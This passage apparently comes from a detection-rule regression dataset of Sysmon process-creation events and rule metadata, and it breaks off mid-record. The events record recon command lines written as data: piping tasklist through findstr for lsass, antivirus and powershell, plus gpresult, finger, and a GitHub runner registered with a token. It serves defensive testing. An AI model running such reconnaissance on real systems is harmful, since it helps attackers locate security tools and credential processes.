\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"tasklist | findstr powershell\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml",
    "content": "id: 5bb16f46-e370-4a40-a47a-d047e4482fc1\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: ccb5742c-c248-4982-8c5c-5571b9275ad3\n      title: Recon Command Output Piped To Findstr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:52:18.663980Z\"\n        }\n      },\n      \"EventRecordID\": 9145421,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:52:18.657\",\n      \"ProcessGuid\": \"5AA13A44-D612-68FC-1931-000000004002\",\n      \"ProcessId\": 5144,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"tasklist | findstr virus\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:52:18.675229Z\"\n        }\n      },\n      \"EventRecordID\": 9145437,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:52:18.674\",\n      \"ProcessGuid\": \"5AA13A44-D612-68FC-1A31-000000004002\",\n      \"ProcessId\": 6320,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Lists the current running tasks\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"tasklist.exe\",\n      \"CommandLine\": \"tasklist\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=A440302FCCCB6D181F8DB017265602397E1EB92A,MD5=2B05A9BDFAEAC5743B47A10F3F0A202B,SHA256=31E6A056EB1E722D8EC8C7E152E6A410B12D6055140BC38FFA1CCBD56AD4E623,IMPHASH=FCEA32ABE79C10DFACC88F5335DD89DE\",\n      \"ParentProcessGuid\": \"5AA13A44-D612-68FC-1931-000000004002\",\n      \"ParentProcessId\": 5144,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd  /c \\\"tasklist | findstr virus\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:52:18.677359Z\"\n        }\n      },\n      \"EventRecordID\": 9145443,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:52:18.676\",\n      \"ProcessGuid\": \"5AA13A44-D612-68FC-1B31-000000004002\",\n      \"ProcessId\": 9052,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  virus\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-D612-68FC-1931-000000004002\",\n      \"ParentProcessId\": 5144,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd  /c \\\"tasklist | findstr virus\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml",
    "content": "id: 4497a849-5942-4e5f-9de7-9c82c41e4ad9\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 4fe074b4-b833-4081-8f24-7dcfeca72b42\n      title: Security Tools Keyword Lookup Via Findstr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:47:36.346438Z\"\n        }\n      },\n      \"EventRecordID\": 12260122,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:47:36.344\",\n      \"ProcessGuid\": \"5AA13A44-0D38-68FD-B736-000000004002\",\n      \"ProcessId\": 7732,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\finger.exe\",\n      \"FileVersion\": \"10.0.20348.3451 (WinBuild.160101.0800)\",\n      \"Description\": \"TCPIP Finger Command\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"finger.exe\",\n      \"CommandLine\": \"finger\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=9DFF43AAF3833E42520A4E426F9132ECFC8A1138,MD5=F05FE1D85C1E9B37E27A78DE2A099977,SHA256=9C08862150B290F3834D02F9C2924C3E163B403AC4B00853BCB78B40E00DE6B5,IMPHASH=4EC5391C083809964BB61804E493A505\",\n      \"ParentProcessGuid\": \"5AA13A44-0BDF-68FD-7936-000000004002\",\n      \"ParentProcessId\": 5232,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd  / c \\\"tasklist | findstr lsass\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/info.yml",
    "content": "id: 312cf7da-b126-4d53-afc7-01c96aa9710e\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: af491bca-e752-4b44-9c86-df5680533dbc\n      title: Finger.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/5bac7a56-da88-4c27-922e-c81e113b20cb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-02T13:40:15.065147Z\"\n        }\n      },\n      \"EventRecordID\": 129581,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3712,\n          \"ThreadID\": 5804\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"SUPPORTHUB\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-02 13:40:15.062\",\n      \"ProcessGuid\": \"39845534-EC3F-692E-AC01-000000007A00\",\n      \"ProcessId\": 2252,\n      \"Image\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Listener.exe\",\n      \"FileVersion\": \"2.329.0.0\",\n      \"Description\": \"Runner.Listener\",\n      \"Product\": \"Runner.Listener\",\n      \"Company\": \"Runner.Listener\",\n      \"OriginalFileName\": \"Runner.Listener.dll\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Listener.exe\\\"  configure --url https://github.com/Koifman/shaihulud --token ACJKO5TZBN2V54V7WQEQMMLJF34ZQ\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\\",\n      \"User\": \"SUPPORTHUB\\\\Lab\",\n      \"LogonGuid\": \"39845534-EA70-692E-18E8-080000000000\",\n      \"LogonId\": \"0x8e818\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=F2D98E1A81C92345E9FB4C3A8BA80DA9,SHA256=0C90A42A6BE0078726279708539FF3275A40031BCCC6D31FCF77D0A03B6F6BBB,IMPHASH=6A91EB82BFD19D2706C7D43C46F7064E\",\n      \"ParentProcessGuid\": \"39845534-EC3E-692E-AA01-000000007A00\",\n      \"ParentProcessId\": 9300,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\config.cmd\\\" --url https://github.com/Koifman/shaihulud --token ACJKO5TZBN2V54V7WQEQMMLJF34ZQ\\\"\",\n      \"ParentUser\": \"SUPPORTHUB\\\\Lab\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-02T13:40:43.642304Z\"\n        }\n      },\n      \"EventRecordID\": 129609,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3712,\n          \"ThreadID\": 5804\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"SUPPORTHUB\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-02 13:40:43.639\",\n      \"ProcessGuid\": \"39845534-EC5B-692E-B601-000000007A00\",\n      \"ProcessId\": 6588,\n      \"Image\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Worker.exe\",\n      \"FileVersion\": \"2.329.0.0\",\n      \"Description\": \"Runner.Worker\",\n      \"Product\": \"Runner.Worker\",\n      \"Company\": \"Runner.Worker\",\n      \"OriginalFileName\": \"Runner.Worker.dll\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Worker.exe\\\" spawnclient 2076 2088\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\\",\n      \"User\": \"SUPPORTHUB\\\\Lab\",\n      \"LogonGuid\": \"39845534-EA70-692E-18E8-080000000000\",\n      \"LogonId\": \"0x8e818\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=B8B5BE3A38732DE389D648044B798146,SHA256=08A676AE543078E5C6163B94E17F9C38D3193A1D59E8BA94ADE43FA0BCA8312C,IMPHASH=6A91EB82BFD19D2706C7D43C46F7064E\",\n      \"ParentProcessGuid\": \"39845534-EC43-692E-AF01-000000007A00\",\n      \"ParentProcessId\": 7392,\n      \"ParentImage\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Listener.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\\\\\bin\\\\Runner.Listener.exe\\\"  run\",\n      \"ParentUser\": \"SUPPORTHUB\\\\Lab\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/info.yml",
    "content": "id: 94e5ba8c-3bdf-4e12-9300-f7684530d301\ndescription: Includes two process events that will match against the linked SIGMA rule for both conditions\ndate: 2025-12-02\nauthor: Daniel Koifman (KoifSec)\nrule_metadata:\n    - id: 5bac7a56-da88-4c27-922e-c81e113b20cb\n      title: Github Self-Hosted Runner Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/5bac7a56-da88-4c27-922e-c81e113b20cb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:09:41.570583Z\"\n        }\n      },\n      \"EventRecordID\": 33638020,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:09:41.563\",\n      \"ProcessGuid\": \"5AA13A44-B845-68FE-3702-000000004102\",\n      \"ProcessId\": 9004,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"Query Group Policy RSOP Data\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"gprslt.exe\",\n      \"CommandLine\": \"gpresult  /z\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\DTrace\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=84DBEACB152615177EB5EE2AC4735B75186BC28F,MD5=80B679C92D709FF93DF2400966A5C183,SHA256=09F58BF0E2D334AAA7410AB613E71F4D1FD346ABEF010423020BD6C3A6C20195,IMPHASH=C853AD8534AC03E7AD69F32A5B0B1625\",\n      \"ParentProcessGuid\": \"5AA13A44-B6AD-68FE-FC01-000000004102\",\n      \"ParentProcessId\": 10508,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/info.yml",
    "content": "id: f0e9da0c-c305-4bcb-89e5-79621d0ba6d2\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: e56d3073-83ff-4021-90fe-c658e0709e72\n      title: Gpresult Display Group Policy Information\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:11:22.294854Z\"\n        }\n      },\n      \"EventRecordID\": 33639600,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:11:22.292\",\n      \"ProcessGuid\": \"5AA13A44-B8AA-68FE-3F02-000000004102\",\n      \"ProcessId\": 7784,\n      \"Image\": \"C:\\\\Windows\\\\hh.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Microsoft® HTML Help Executable\",\n      \"Product\": \"HTML Help\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"HH.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Windows\\\\hh.exe\\\" C:\\\\Windows\\\\IME\\\\IMETC\\\\HELP\\\\IMTCTC14.CHM\",\n      \"CurrentDirectory\": \"C:\\\\Windows\\\\IME\\\\IMETC\\\\HELP\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=641EF54FAECFA4E912DB88075FD25AABDB233A79,MD5=44A6B0A791E00D169EC0FFCFF0A17EB3,SHA256=39811F6070E82E9AA67A4D3E6153A7CD70519DBBAC36067157C573E2F736AA9E,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C\",\n      \"ParentProcessGuid\": \"5AA13A44-B55F-68FE-1A01-000000004102\",\n      \"ParentProcessId\": 8100,\n      \"ParentImage\": \"C:\\\\Program Files\\\\Everything\\\\Everything.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Program Files\\\\Everything\\\\Everything.exe\\\" -startup\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml",
    "content": "id: 627bc1e3-7961-4d77-96df-915627f8c3fc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84\n      title: HH.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/c598cc0c-9e70-4852-b9eb-8921af79f598.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T08:12:45.123135Z\"\n        }\n      },\n      \"EventRecordID\": 733841,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 08:12:45.093\",\n      